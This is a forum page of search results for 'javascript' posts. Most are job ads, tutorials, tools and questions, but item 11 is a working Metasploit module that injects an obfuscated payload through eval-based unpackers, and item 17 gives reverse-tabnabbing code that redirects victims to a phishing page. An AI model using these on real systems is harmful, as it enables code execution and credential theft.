Showing results for tags 'javascript'.

Found 25 results

  1. Hello, I'd like to find someone skilled in JavaScript and Python to take over 2 projects from me. The client pays 30 euro/hour for programming and 10 euro/hour for the rest (calls, documentation, etc.). The projects are functional but need maintenance and improvements, plus the client isn't familiar with Linux, so everything has to be explained patiently. Thanks, mihk
  2. Advanced knowledge of PHP/MySQL, HTML/CSS/JS (jQuery), JavaScript; intermediate English; experience with e-commerce projects (WordPress WooCommerce, OpenCart, PrestaShop, Magento) and API implementation. You will work on e-commerce projects. We are looking for proactive people who see problems through to the end, and who have the desire and the ability to create their own structures and implement their own vision for solving a task.
  3. Overview

    TL;DR: There are a ton of great JavaScript frameworks out there, and it can be a little overwhelming to keep up with them all. The learning curve for these frameworks can also be a bit steep. Vue.js is a breath of fresh air in this regard. In this tutorial, we'll see how easy it is to get up and running with a Vue.js app and how we can easily add authentication to it. Check out the repo to get the code.

    We are lucky to have plenty of JavaScript frameworks to choose from these days but, at the same time, it can be quite fatiguing to keep up with all of them. Some have a steep learning curve and require a lot of time for developers and their teams to become comfortable with. Others might be easy to learn, but perhaps lack some features that are crucial to a project. In either case, the level of complexity associated with learning a new framework can often hinder adoption and leave developers and teams frustrated.

    If you're still choosing a framework for your Single Page App (SPA), or if you just want to learn a new technology, I believe Vue.js is one of the best frameworks you can pick. I love Vue.js for its simplicity and elegance, and how I can be super productive with it without needing to spend tons of time learning. In my experience, Vue.js just works and gets out of my way when developing applications.

    Those are some anecdotal selling points, but let's cut to the hard facts: what exactly is Vue.js and how does it differ from other frameworks? If you're familiar with AngularJS 1.x, then Vue.js will probably look pretty familiar. In fact, Vue is heavily inspired by Angular. So what's the difference then? Essentially, Vue has a much simpler and cleaner API, is more flexible, and claims better performance. Vue.js is firstly a view layer for applications that allows for reactive data binding and composable view components, and many developers use it only for their view layers. However, when combined with other tools in the Vue ecosystem, such as vue-router, vue-resource, and vue-loader, we get all the benefits of a great SPA framework while simplicity and developer experience are maintained.

    What We'll Build: A Vue.js Authentication App

    To demonstrate how easy it is to get up and running with a full SPA using Vue, we'll build a simple app that retrieves Chuck Norris quotes from a NodeJS backend. Vue can easily be mixed with other technologies, and you can use Vue for as much or as little of your app as you wish. To demonstrate Vue's full potential though, we'll build the whole front-end SPA with Vue components and follow Vue's pattern for large-scale applications. The front-end app will be totally decoupled from the back end, and we'll make HTTP requests to RESTful endpoints on our server.

    We'll also demonstrate how we can easily add authentication to our Vue.js app. We'll put Login and Signup components in place to show how we can retrieve and save a user's JWT, and then send it back to the server for accessing protected endpoints.

    Rather than listing out how Vue implements certain features and comparing them to other frameworks, we'll let the code speak for itself. Again, if you're familiar with Angular, it will be easy to reason about Vue's features and syntax.

    Installation and Setup

    Everything we need to start our component-based Vue.js app is on NPM. To get started, let's pull down what we need by creating our package.json file and specifying the packages we need. We can take full advantage of ES6 for our Vue components, and to make that happen, we'll use Babel. We'll also bundle everything up with Webpack and use hot reloading to see changes to our modules happen immediately. If you wish, you can also use other build tools (like Browserify) instead of Webpack.

        // package.json
        ...
        "devDependencies": {
          "babel-core": "^6.1.2",
          "babel-loader": "^6.1.0",
          "babel-plugin-transform-runtime": "^6.1.2",
          "babel-preset-es2015": "^6.1.2",
          "babel-runtime": "^6.0.14",
          "css-loader": "^0.21.0",
          "style-loader": "^0.13.0",
          "vue-hot-reload-api": "^1.2.1",
          "vue-html-loader": "^1.0.0",
          "vue-loader": "^7.0.1",
          "webpack": "^1.12.3",
          "webpack-dev-server": "^1.12.1"
        },
        "dependencies": {
          "bootstrap": "^3.3.5",
          "vue-resource": "^0.1.17",
          "vue-router": "^0.7.5",
          "vue": "^1.0.7"
        }
        ...

    Once the rest of our package.json file is in place, we can install everything.

        npm install

    To make Webpack work, we need a configuration file for it. Let's put in a file called webpack.config.js and populate it.

        // webpack.config.js
        module.exports = {
          // the main entry of our app
          entry: ['./src/index.js', './src/auth/index.js'],
          // output configuration
          output: {
            path: __dirname + '/build/',
            publicPath: 'build/',
            filename: 'build.js'
          },
          module: {
            loaders: [
              // process *.vue files using vue-loader
              { test: /\.vue$/, loader: 'vue' },
              // process *.js files using babel-loader
              // the exclude pattern is important so that we don't
              // apply babel transform to all the dependencies!
              { test: /\.js$/, loader: 'babel', exclude: /node_modules/ }
            ]
          },
          babel: {
            presets: ['es2015'],
            plugins: ['transform-runtime']
          }
        }

    In this config file, we're first specifying where our app's main entry point is and what the output path should be. The bundled JavaScript will be served as one file called build.js.

    In the module.loaders array, we're setting up processing for our Vue components. These components have an extension of .vue and are processed by vue-loader.

    That's all the configuration we need for now. Once we have our files in place, we just need to run webpack-dev-server --inline --hot to bundle and serve everything.

    Setting Up the Back End

    We're using our trusty nodejs-jwt-authentication-sample to retrieve Chuck Norris quotes.
    Clone the repo wherever you like (here we're putting it in a server directory) and follow the readme for installation steps.

    Setting Up the Vue Components

    Let's get started with the actual components for our app. But first, what exactly is a Vue component and how does it work? Vue components allow us to specify a template, a script, and style rules all in one file. If you're familiar with React, this will likely be familiar. This move toward composition and splitting the app into small components is helpful for maintenance and reasoning about the app.

    To see how this works, let's start with the Home component.

        <!-- src/components/Home.vue -->
        <template>
          <div class="col-sm-6 col-sm-offset-3">
            <h1>Get a Free Chuck Norris Quote!</h1>
            <button class="btn btn-primary" v-on:click="getQuote()">Get a Quote</button>
            <div class="quote-area" v-if="quote">
              <h2><blockquote>{{ quote }}</blockquote></h2>
            </div>
          </div>
        </template>

        <script>
        export default {
          data() {
            return {
              quote: ''
            }
          },
          methods: {
            getQuote() {
              this.$http
                .get('http://localhost:3001/api/random-quote', (data) => {
                  this.quote = data;
                })
                .error((err) => console.log(err))
            }
          }
        }
        </script>

    The template is just some simple markup with a button that calls the method getQuote. We can notice some similarities to Angular in this code already. The template uses directives like v-on:click for click events, and v-if to conditionally show and hide the quote-area div. Vue also uses the double curly brace syntax for templating, which is how we take care of rendering the quote property.

    The script area exports an object that is converted into a component constructor function by Vue. It has on it a data method and a methods object where we can register custom methods. When we want to register a data property to be used in the template, we need to do so in the data method. If we were to leave out the quote property from the returned object, that property wouldn't be rendered in the template.
    The getQuote method makes an HTTP request to our back end and sets the returned data on the quote property.

    This gives us a good idea of what Vue components look like, but this won't work quite yet because we need to set up our app's main entry point, as well as a main App component. Here's how this component will render once everything is set up:

    Setting Up index.js and App.vue

    The index.js file is the place where we set up our main imports and do other configuration like routing. Let's set up everything we'll need for the whole app right now.

        // src/index.js
        import Vue from 'vue'
        import App from './components/App.vue'
        import Home from './components/Home.vue'
        import SecretQuote from './components/SecretQuote.vue'
        import Signup from './components/Signup.vue'
        import Login from './components/Login.vue'
        import VueRouter from 'vue-router'
        import VueResource from 'vue-resource'

        Vue.use(VueResource)
        Vue.use(VueRouter)

        export var router = new VueRouter()

        // Set up routing and match routes to components
        router.map({
          '/home': { component: Home },
          'secretquote': { component: SecretQuote },
          '/login': { component: Login },
          '/signup': { component: Signup }
        })

        // Redirect to the home route if any routes are unmatched
        router.redirect({ '*': '/home' })

        // Start the app on the #app div
        router.start(App, '#app')

    We're importing some components we've yet to create, as well as vue-router and vue-resource. For the app to recognize vue-router and vue-resource, we just need to call Vue.use on them. We can set up our route definitions with the simple map method on our instance of vue-router. The reason we're exporting this instance is so we can get a reference to it in our other components.

        <!-- src/components/App.vue -->
        <template>
          <nav class="navbar navbar-default">
            <div class="container">
              <ul class="nav navbar-nav">
                <li><a v-link="'home'">Home</a></li>
                <li><a v-link="'login'">Login</a></li>
                <li><a v-link="'signup'">Sign Up</a></li>
                <li><a v-link="'secretquote'">Secret Quote</a></li>
                <li><a v-link="'login'">Logout</a></li>
              </ul>
            </div>
          </nav>
          <div class="container">
            <router-view></router-view>
          </div>
        </template>

    To start out, our App component just needs a template. This top-level component has a navbar and exposes a router-view which is where our various routes will be rendered. Linking to routes is as simple as placing v-link on the anchor tags.

    Finally, we need to be sure to place a div with an id of app within index.html, as this is where the whole app will be exposed.

        <!-- index.html -->
        ...
        <body>
          <div id="app"></div>
          <script src="build/build.js"></script>
        </body>
        ...

    User Authentication - Login and Signup Components

    To log users in, we'll need to make an HTTP request to our authentication endpoint and save the JWT that is returned in localStorage. We could place this logic right within our Login component, but we should really have a service to make it more reusable. Let's create a directory called auth and provide an index.js file there.
        // src/auth/index.js
        import {router} from '../index'

        // URL and endpoint constants
        const API_URL = 'http://localhost:3001/'
        const LOGIN_URL = API_URL + 'sessions/create/'
        const SIGNUP_URL = API_URL + 'users/'

        export default {

          // User object will let us check authentication status
          user: {
            authenticated: false
          },

          // Send a request to the login URL and save the returned JWT
          login(context, creds, redirect) {
            context.$http.post(LOGIN_URL, creds, (data) => {
              localStorage.setItem('id_token', data.id_token)
              localStorage.setItem('access_token', data.access_token)

              this.user.authenticated = true

              // Redirect to a specified route
              if(redirect) {
                router.go(redirect)
              }

            }).error((err) => {
              context.error = err
            })
          },

          signup(context, creds, redirect) {
            context.$http.post(SIGNUP_URL, creds, (data) => {
              localStorage.setItem('id_token', data.id_token)
              localStorage.setItem('access_token', data.access_token)

              this.user.authenticated = true

              if(redirect) {
                router.go(redirect)
              }

            }).error((err) => {
              context.error = err
            })
          },

          // To log out, we just need to remove the token
          logout() {
            localStorage.removeItem('id_token')
            localStorage.removeItem('access_token')
            this.user.authenticated = false
          },

          checkAuth() {
            var jwt = localStorage.getItem('id_token')
            if(jwt) {
              this.user.authenticated = true
            }
            else {
              this.user.authenticated = false
            }
          },

          // The object to be passed as a header for authenticated requests
          getAuthHeader() {
            return {
              'Authorization': 'Bearer ' + localStorage.getItem('access_token')
            }
          }
        }

    Our auth service exposes methods for logging users in and out, signing them up, and checking their authentication status. Note that "logging in" is just a matter of saving the JWT that is returned by the server. These methods and properties will all be useful throughout the app. For example, we can use the user.authenticated property to conditionally show elements in the app.
    Implementing the Login Component

    The Login component will need some HTML for the user inputs and a method to call our auth service.

        <!-- src/components/Login.vue -->
        <template>
          <div class="col-sm-4 col-sm-offset-4">
            <h2>Log In</h2>
            <p>Log in to your account to get some great quotes.</p>
            <div class="alert alert-danger" v-if="error">
              <p>{{ error }}</p>
            </div>
            <div class="form-group">
              <input
                type="text"
                class="form-control"
                placeholder="Enter your username"
                v-model="credentials.username"
              >
            </div>
            <div class="form-group">
              <input
                type="password"
                class="form-control"
                placeholder="Enter your password"
                v-model="credentials.password"
              >
            </div>
            <button class="btn btn-primary" @click="submit()">Access</button>
          </div>
        </template>

        <script>
        import auth from '../auth'

        export default {
          data() {
            return {
              // We need to initialize the component with any
              // properties that will be used in it
              credentials: {
                username: '',
                password: ''
              },
              error: ''
            }
          },
          methods: {
            submit() {
              var credentials = {
                username: this.credentials.username,
                password: this.credentials.password
              }
              // We need to pass the component's this context
              // to properly make use of http in the auth service
              auth.login(this, credentials, 'secretquote')
            }
          }
        }
        </script>

    HTTP calls made with vue-resource require a component's context, and since we're abstracting that logic to a service, we need to pass the Login component's this context to the service. The second argument is the object with the user's credentials, and the third is the route we want to redirect to upon successfully authenticating.

    Note that we're using @click on our submit button here. This is a shorthand alternative to v-on:click.

    The Signup component is nearly identical, except it will use the signup method from the auth service to send the user's credentials to a different endpoint.

    Implementing the Secret Quote Component

    When a user successfully authenticates, they will be able to access the secret-quote route from the API.
    The SecretQuote component will look similar to the Home component, but we'll attach the user's JWT as an Authorization header when requests are sent.

        <!-- src/components/SecretQuote.vue -->
        <template>
          <div class="col-sm-6 col-sm-offset-3">
            <h1>Get a Secret Chuck Norris Quote!</h1>
            <button class="btn btn-warning" v-on:click="getQuote()">Get a Quote</button>
            <div class="quote-area" v-if="quote">
              <h2><blockquote>{{ quote }}</blockquote></h2>
            </div>
          </div>
        </template>

        <script>
        import auth from '../auth'

        export default {
          data() {
            return {
              quote: ''
            }
          },
          methods: {
            getQuote() {
              this.$http
                .get('http://localhost:3001/api/protected/random-quote', (data) => {
                  this.quote = data;
                }, {
                  // Attach the JWT header
                  headers: auth.getAuthHeader()
                })
                .error((err) => console.log(err))
            }
          },
          route: {
            // Check the user's auth status before
            // allowing navigation to the route
            canActivate() {
              return auth.user.authenticated
            }
          }
        }
        </script>

    The header is attached by providing an options object as the third argument to the HTTP request. To get the JWT header, we call the getAuthHeader method from the auth service.

    Since we don't want users to access this route if they are not authenticated, we can tap into vue-router's transition pipeline. Specifically, we use the canActivate hook and consult the auth service to check if the user is authenticated. If so, the route can be navigated to.

    Final Touches

    We're nearly done, but there are a couple of improvements we can make before we finish out. It would be good to conditionally show and hide menu items based on the user's auth status. To do that, we'll use v-if.

        <!-- src/components/App.vue -->
        <template>
          <nav class="navbar navbar-default">
            <div class="container">
              <ul class="nav navbar-nav">
                <li><a v-link="'home'">Home</a></li>
                <li><a v-link="'login'" v-if="!user.authenticated">Login</a></li>
                <li><a v-link="'signup'" v-if="!user.authenticated">Sign Up</a></li>
                <li><a v-link="'secretquote'" v-if="user.authenticated">Secret Quote</a></li>
                <li><a v-link="'login'" v-if="user.authenticated" @click="logout()">Logout</a></li>
              </ul>
            </div>
          </nav>
          <div class="container">
            <router-view></router-view>
          </div>
        </template>

        <script>
        import auth from '../auth'

        export default {
          data() {
            return {
              user: auth.user
            }
          },
          methods: {
            logout() {
              auth.logout()
            }
          }
        }
        </script>

    The auth service sets the user's authentication status when the login or logout methods are used, but if the page is refreshed or the app closed and reopened, that status will be lost. To get around that, let's call checkLogin when the app is first loaded.

        // src/index.js
        ...
        import auth from './auth'

        // Check the user's auth status when the app starts
        auth.checkAuth()
        ...

    Setting Global Headers

    When we make a request to the protected secret-quote route, we pass an options object that has the Authorization header and user's JWT access_token on it. If, instead, we wanted to globally set the Authorization header and not worry about setting it on each HTTP request, we could set up a global header.

        // src/index.js
        ...
        // Optional
        // getAuthHeader() returns an object, so take its Authorization value
        Vue.http.headers.common['Authorization'] = auth.getAuthHeader().Authorization;
        ...

    Aside: Using Auth0 With Your Vue.js App

    Auth0 issues JSON Web Tokens on every login for your users. This means that you can have a solid identity infrastructure, including single sign-on, user management, support for social identity providers (Facebook, Github, Twitter, etc.), enterprise identity providers (Active Directory, LDAP, SAML, etc.) and your own database of users with just a few lines of code.

    We can easily set up authentication in our Vue.js apps by using the Lock Widget.
    Step 1: Include Auth0's Lock Widget

        <!-- index.html -->
        ...
        <!-- Auth0 Lock script -->
        <script src="//cdn.auth0.com/js/lock-7.11.1.min.js"></script>
        ...

    Step 2: Instantiate Lock in index.js

        // src/index.js
        ...
        // Instantiate a Lock
        export var lock = new Auth0Lock(YOUR_CLIENT_ID, YOUR_CLIENT_DOMAIN)
        ...

    Step 3: Call the Lock Widget from a Vue.js Component

        <!-- src/components/Login.vue -->
        <template>
          <div class="col-sm-4 col-sm-offset-4">
            <h2>Log In</h2>
            <p>Log In with Auth0's Lock Widget.</p>
            <button class="btn btn-primary" @click="login()">Log In</button>
          </div>
        </template>

        <script>
        // Import the Lock instance
        import {lock} from '../index'

        export default {
          methods: {
            login() {
              // Show the Lock Widget and save the user's JWT on a successful login
              lock.show((err, profile, id_token) => {
                localStorage.setItem('profile', JSON.stringify(profile))
                localStorage.setItem('id_token', id_token)
              })
            },
            logout() {
              // Remove the profile and token from localStorage
              localStorage.removeItem('profile')
              localStorage.removeItem('id_token')
            }
          }
        }
        </script>

    Important API Security Note: If you want to use Auth0 authentication to authorize API requests, note that you'll need to use a different flow depending on your use case. Auth0 idToken should only be used on the client-side. Access tokens should be used to authorize APIs. You can read more about making API calls with Auth0 here.

    Wrapping Up

    We have many great choices for SPA frameworks these days, and this can easily cause analysis paralysis. Further, it can be fatiguing to keep up with the pace of new framework development and to learn their ins and outs. I find Vue.js to be a breath of fresh air in this regard. The library and ecosystem are feature-rich, but they get out of your way as you develop your apps. I've found that the learning curve with Vue.js isn't as steep as it can be with other frameworks, and from my experience, it seems to always just work.
    As we saw in this tutorial, we can easily add authentication to our Vue.js apps. Also, Vue's HTTP library, vue-resource, makes it trivial to send requests with an Authorization header. I hope you'll consider Vue.js for your next project--it really is great to work with!

    Source: https://auth0.com/blog/build-an-app-with-vuejs/
  4. The finest NBA CLI.

    Watch NBA live play-by-play, game preview, box score and player information on your console. The best CLI tool for those who are both NBA fans and engineers. All data comes from stats.nba.com APIs.

    Install

        $ npm install -g nba-go

    Usage

    nba-go provides two main commands:

      • game or g
      • player or p

    Game

    There are two things to do:

      • Check the schedule.
      • Choose one game which you want to watch.

    Depending on the status of the game you chose, it shows a different result. There are three kinds of status that may occur:

      • Pregame: It shows when the game starts. Selecting this will show the comparison between two teams, including average points, field goal percents, average assists, etc.
      • Live: It shows live game clock. Most powerful feature! Selecting this will show the live page which includes scoreboard, play-by-play and box score.
      • Final: Selecting this will show scoreboard, detailed box score, etc.

    Check schedule

    To show the schedule on a given day, nba-go provides the command nba-go game with some options.

    Options

      • -d <date> or --date <date>: Enter a specific date to check the schedule on that day.

            $ nba-go game -d 2017/11/02

      • -y or --yesterday: Check yesterday's schedule.

            $ nba-go game -y

      • -t or --today: Check today's schedule.

            $ nba-go game -t

      • -T or --tomorrow: Check tomorrow's schedule.

            $ nba-go game -T

    Pregame

    Check the detailed comparison data between two teams in the game.

    Live

    Best feature! Realtime updated play-by-play, scoreboard and box score. Turn on fullscreen mode for a better experience. Btw, play-by-play is scrollable!

    Final

    Check two teams' detailed scoreboard and box score.

    Player

    Get player's basic information, regular season data and playoffs data.

    Note: You must place the player's name between nba-go player and the options.

    Options

      • -i or --info: Get player's basic information.

            $ nba-go player Curry -i

      • -r or --regular: Get player's basic information.

            $ nba-go player Curry -r

      • -p or --playoffs: Get player's basic information.

            $ nba-go player Curry -p

      • Mix them all: Get all data at the same time.

            $ nba-go player Curry -i -r -p

    Related repos: watch-nba, nba-color

    License: MIT

    Download: nba-go-master.zip or

        git clone https://github.com/xxhomey19/nba-go.git

    Sources:
    https://www.npmjs.com/package/nba-go
    https://github.com/xxhomey19/nba-go
  5. rtfmplay


    Hi, I haven't really worked with JavaScript and I want to ask something about it. I need to replace some characters typed from the keyboard into a text input. It should replace "-" with "/" while the user is typing, and it has to happen as the text is being entered:

        23gg3j3b-3dd9ds-ossd33yj-oopw3
        23gg3j3b/3dd9ds/ossd33yj/oopw3
  6. I tried a few online tools but didn't get good results. I'll buy a beer for whoever can help me. Thanks in advance. http://pastebin.com/raw/cPd9jYNi
  7. What is the best method to detect whether a user is using a proxy when visiting a site? I know some proxies are impossible to detect; I'm interested in detecting the ones that don't protect the user 100%. For now I'm using this PHP code, but it's an old method and some proxies don't set headers. Can something be done with JavaScript? Or other PHP methods? I've also seen a method that does a reverse check and verifies the port; it's not OK, the page loads slowly, there are many ports, and the result can be a false positive. I don't want to use an API or services offering blacklists, etc.

        // Request headers that forwarding proxies commonly add
        $proxy_headers = array(
            'HTTP_VIA', 'HTTP_X_FORWARDED_FOR', 'HTTP_FORWARDED_FOR',
            'HTTP_X_FORWARDED', 'HTTP_FORWARDED', 'HTTP_CLIENT_IP',
            'HTTP_FORWARDED_FOR_IP', 'VIA', 'X_FORWARDED_FOR',
            'FORWARDED_FOR', 'X_FORWARDED', 'FORWARDED',
            'CLIENT_IP', 'FORWARDED_FOR_IP', 'HTTP_PROXY_CONNECTION'
        );
        // Report a proxy for each of these headers present in the request
        foreach ($proxy_headers as $x) {
            if (isset($_SERVER[$x])) echo("You are using a proxy!");
        }

    UPDATE (maybe someone else needs it):

    What is a "WebRTC leak"? WebRTC implements STUN (Session Traversal Utilities for NAT), a protocol that allows discovering the public IP address.

    Live Demo: https://diafygi.github.io/webrtc-ips/
    More Info: https://www.privateinternetaccess.com/forum/discussion/8204/how-to-stop-webrtc-local-ip-address-leaks-on-google-chrome-and-mozilla-firefox-while-using-private-i

    I visited it through a proxy and it showed my real IP; it works in Chrome and Firefox. With a VPN it could not see the real IP. On Android and other browsers, from what I've read, it doesn't work.

    To disable WebRTC:

      • Mozilla Firefox: Type "about:config" in the address bar. Scroll down to "media.peerconnection.enabled", double click to set it to false.
      • Google Chrome: Install Google official extension WebRTC Network Limiter.

    Thanks to
  8. Security researchers from Trend Micro recently discovered a new JavaScript-based malware that infects your mobile devices and also attacks your home router by altering its DNS (Domain Name System) settings. This new threat was named JS_JITON and was first noticed at the end of December 2015, continuing to infect devices up until this day, hitting its peak in February 2016, with over 1,500 infections per day.

    Researchers say that the malware spreads its infection chain in a very simple way. Attackers place their code in some websites and wait for users to visit.

    The malware’s infection chain is simple. According to Trend Micro researchers, attackers place malicious code on compromised websites and wait for users to visit these pages using mobile devices. Once this happens, the malware is downloaded to the user’s mobile device and executes, trying to connect to the local home network’s router IP using a series of admin and password combos hardcoded in the JS_JITON malware source code. Over 1,400 credentials are included, and once the malware authenticates on the device, it will change the router’s DNS settings.

    Very little is known about what the intentions of this malware are, but taking into account that at one point it also included malicious code that executed from desktop computers, Trend Micro researchers believe this is a “work in progress,” with its creators still exploring their attack’s capabilities. The belief was made strong by the fact that attackers regularly update JS_JITON’s source code, changing small details here and there, fine-tuning their attacks. Additionally, at one point, the JS_JITON source code also included a keylogging component.

    According to researchers, JS_JITON could attack D-Link and TP-Link routers, but it also included a special exploit to take advantage of CVE-2014-2321, an older vulnerability in ZTE modems. Malware like this could be a serious threat if not killed in the initial stage.

    Source
  9. Hi, JavaScript can be learned from a single image: https://github.com/coodict/javascript-in-one-pic
  10. Hi, I need someone who knows JavaScript to modify something in this code. Pastebin.com Paid. Thank you.
  11. ##
      # This module requires Metasploit: http://metasploit.com/download
      # Current source: https://github.com/rapid7/metasploit-framework
      ##

      require 'msf/core'
      require 'msf/core/exploit/jsobfu'

      class Metasploit3 < Msf::Exploit::Remote
        Rank = ExcellentRanking

        include Msf::Exploit::FILEFORMAT
        include Msf::Exploit::JSObfu

        def initialize(info = {})
          super(update_info(info,
            'Name' => 'Javascript Injection for Eval-based Unpackers',
            'Description' => %q{
              This module generates a Javascript file that executes arbitrary code
              when an eval-based unpacker is run on it. Works against js-beautify's
              P_A_C_K_E_R unpacker.
            },
            'Author' => [ 'joev' ],
            'License' => MSF_LICENSE,
            'References' => [ ],
            'Platform' => 'nodejs',
            'Arch' => ARCH_NODEJS,
            'Privileged' => false,
            'Targets' => [['Automatic', {}]],
            'DisclosureDate' => 'Feb 18 2015',
            'DefaultTarget' => 0))

          register_options([
            OptString.new('FILENAME', [true, 'The file name.', 'msf.js']),
            OptString.new('CUSTOM_JS', [false, 'Custom Javascript payload.'])
          ], self.class)
        end

        def exploit
          p = js_obfuscate(datastore['CUSTOM_JS'] || payload.encoded);
          print_status("Creating '#{datastore['FILENAME']}' file...")
          file_create("eval(function(p,a,c,k,e,r){}((function(){ #{p} })(),''.split('|'),0,{}))")
        end
      end

      Source
  12. sharkyz

    [JS] Alarma

    Un mic script in js pentru a te avertiza dupa o anumita perioada de timp predefinita de utilizator. // Alarm Clock Mai jos aveti codul sursa care il puteti copia in consola din chrome. // (Ctrl-Shift-C) (function() { (function() { var tim_def = prompt("Timp pana la declansarea alarmei?"); if (tim_def.length === 1) { var tim = tim_def; } else if (tim_def.length > 1) { var tim = tim_def.slice(0,-1); } else { alert ('Raspunsul nu este valid incearca din nou!') } var lctim = tim_def.slice(-1); var audio = new Audio('http://soundjax.com/reddo/97744%5EALARM.mp3'); var alerta = function(smo) { var mes = prompt("Ce ai vrea sa spun alerta ta?", "Alert!"); if (tim_def !== null) { setTimeout(function() { audio.play(); alert(mes ? mes : 'Alarma!'); }, 1000 * smo * parseFloat(tim)); } }; switch (lctim) { case 's': //secunde alerta(1); break; case 'm': //minute alerta(60); break; case 'o': //ore alerta(3600); break; default: alerta(60); break; } })(); })(); In plus puteti face un bookmark cu codul de mai jos: javascript:!function(){!function(){var a=prompt("Timp pana la declansarea alarmei?");if(1===a.length)var e=a;else if(a.length>1)var e=a.slice(0,-1);else alert("Raspunsul nu este valid incearca din nou!");var l=a.slice(-1),n=new Audio("http://soundjax.com/reddo/97744%5EALARM.mp3"),r=function(l){var r=prompt("Ce ai vrea sa spun alerta ta?","Alert!");null!==a&&setTimeout(function(){n.play(),alert(r?r:"Alarma!")},1e3*l*parseFloat(e))};switch(l){case"s":r(1);break;case"m":r(60);break;case"o":r(3600);break;default:r(60)}}()}();
  13. Looking for someone who can work in PHP, HTML or JavaScript. PM for details.
  14. Versus71


    Regex101.com is a free of charge regex testing service where you can easily create expressions while you simultaneously have real time error detection, highlighting and explanation of your regex. Thanks to the permalink feature, it is a great reference which may even be used in code where you need to explain your regular expressions to co-workers. Link: regex101.com
  15. I need a script that keeps track of every time a registered user of the site shares an article on social networks (FB, Twitter, G+ and Pinterest). Each time the user shares an article, that user's share count goes up by one. The site runs on WordPress and the hosting is solid.
  16. I found a funny piece of JavaScript on the net and thought I'd share it with you, in case anyone is interested. You paste it into the console (F12), or right click > Inspect element > Console in Chrome or a similar browser, preferably on the Facebook page because it's more interesting there.

        javascript:(function(){function c(){var e=document.createElement("link");e.setAttribute("type","text/css");e.setAttribute("rel","stylesheet");e.setAttribute("href",f);e.setAttribute("class",l);document.body.appendChild(e)}function h(){var e=document.getElementsByClassName(l);for(var t=0;t<e.length;t++){document.body.removeChild(e[t])}}function p(){var e=document.createElement("div");e.setAttribute("class",a);document.body.appendChild(e);setTimeout(function(){document.body.removeChild(e)},100)}function d(e){return{height:e.offsetHeight,width:e.offsetWidth}}function v(i){var s=d(i);return s.height>e&&s.height<n&&s.width>t&&s.width<r}function m(e){var t=e;var n=0;while(!!t){n+=t.offsetTop;t=t.offsetParent}return n}function g(){var e=document.documentElement;if(!!window.innerWidth){return window.innerHeight}else if(e&&!isNaN(e.clientHeight)){return e.clientHeight}return 0}function y(){if(window.pageYOffset){return window.pageYOffset}return Math.max(document.documentElement.scrollTop,document.body.scrollTop)}function E(e){var t=m(e);return t>=w&&t<=b+w}function S(){var e=document.createElement("audio");e.setAttribute("class",l);e.src=i;e.loop=false;e.addEventListener("canplay",function(){setTimeout(function(){x(k)},500);setTimeout(function(){N();p();for(var e=0;e<O.length;e++){T(O[e])}},15500)},true);e.addEventListener("ended",function(){N();h()},true);e.innerHTML=" <p>If you are reading this, it is because your browser does not support the audio element. We recommend that you get a new browser.</p> <p>";document.body.appendChild(e);e.play()}function x(e){e.className+=" "+s+" "+o}function T(e){e.className+=" "+s+" "+u[Math.floor(Math.random()*u.length)]}function N(){var e=document.getElementsByClassName(s);var t=new RegExp("\\b"+s+"\\b");for(var n=0;n<e.length;){e[n].className=e[n].className.replace(t,"")}}var e=30;var t=30;var n=350;var r=350;var i="//s3.amazonaws.com/moovweb-marketing/playground/harlem-shake.mp3";var s="mw-harlem_shake_me";var o="im_first";var u=["im_drunk","im_baked","im_trippin","im_blown"];var a="mw-strobe_light";var f="//s3.amazonaws.com/moovweb-marketing/playground/harlem-shake-style.css";var l="mw_added_css";var b=g();var w=y();var C=document.getElementsByTagName("*");var k=null;for(var L=0;L<C.length;L++){var A=C[L];if(v(A)){if(E(A)){k=A;break}}}if(A===null){console.warn("Could not find a node of the right size. Please try a different page.");return}c();S();var O=[];for(var L=0;L<C.length;L++){var A=C[L];if(v(A)){O.push(A)}}})()

    This script does something like this; it's nothing special, but maybe someone will get an idea for modifying it or using it in some way.
  17. I hope I'm not wrong in saying that we all know what a link is and what the target attribute of the <a> tag is for. And since most people consider this very popular technique harmless, in this tutorial I will try to demonstrate the opposite.

    To begin with, I want to mention that I personally consider what is described here to be a vulnerability in all browsers except... ta-da! Internet Explorer. That is why, from here on, I will use the word "vulnerability" when referring to this "phenomenon". Also, please note that this vulnerability works perfectly only if the link is left-clicked, not right-clicked → "Open in new tab". And last but not least, since everyone recommends using target="_blank" for all external links (after all, we don't want the user to leave our page), I have to note that this vulnerability affects most sites that link to external pages.

    Theory

    If we have the current page "A" and link to page "B" using the target="_blank" attribute, then when page "B" opens, a window.opener object is created for it, with which we can redirect page "A" to a new page while the user is viewing page "B". Most importantly, pages "A" and "B" can be on different domains.

    Practice

    To better understand what this is about, I recommend the following example: click here, wait for the page to load, then come back. If the error "window.opener is null" appears, then:

      • You opened the link some other way than with a left click;
      • Your browser is not vulnerable;
      • Black magic?

    For a more complex example, please visit this page, where I used this vulnerability to simulate a phishing attack on a site that offers email services. As on any similar site (Gmail, Hotmail, etc.), every link received in a message has the target="_blank" attribute.

    Explanations

    To exploit the vulnerability, we send a message containing the URL of the "trap" page, where, to be sure the user opened the link with a left click and not some other way, we check that the window.opener object exists and is not NULL. After that, we can redirect the page the user came from. The code looks roughly like this:

        if (window.opener) {
            window.opener.location.replace('full-url-to-scam-page');
        }

    As you can see, it is all so simple, so trivial, so dangerous... If the phishing page and the legitimate one look like two drops of water, and the domain name does not raise suspicion, then when the user returns to the initial page they will certainly not notice the change.

    To raise less suspicion, the URL of the phishing page can be modified as follows: from the funny.php page we need to send the URL (referrer) the user came from. I did it like this:

        var referrer = encodeURIComponent(document.referrer);
        window.opener.location = 'http://black.securrity.com/t_blank/scam.php#' + referrer;

    Then, on the scam.php page I used the following code:

        // Extract the URL path and strip the domain name
        var fake_url = decodeURIComponent(window.location.hash).replace('#http://white.securrity.com', '');
        // Change the URL without loading that page's content
        window.history.pushState(false, false, fake_url);

    Instead of conclusions

    Honestly, I don't understand what the developers were thinking when they allowed location.replace() to be called, or the location object to be modified, between two different domains. If it were on the same domain, I would understand... And it really is very strange, because the other functions and attributes of the window.opener object cannot even be read, because:
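Added example (not part of the original post) for the window.opener behaviour described in item 17: a Node.js audit that finds `<a target="_blank">` links carrying neither `rel="noopener"` nor `rel="noreferrer"` and adds both, so that the opened page gets `window.opener === null` and cannot redirect the page that linked to it. The function names and the `*.example` sample markup are constructed for illustration.

```javascript
// Added example: audit and harden target="_blank" links in an HTML string.
// Current browsers already imply noopener for target="_blank"; the explicit
// rel value also covers older browsers and embedded web views.

// One <a ...> start tag; quoted attribute values may contain '>'.
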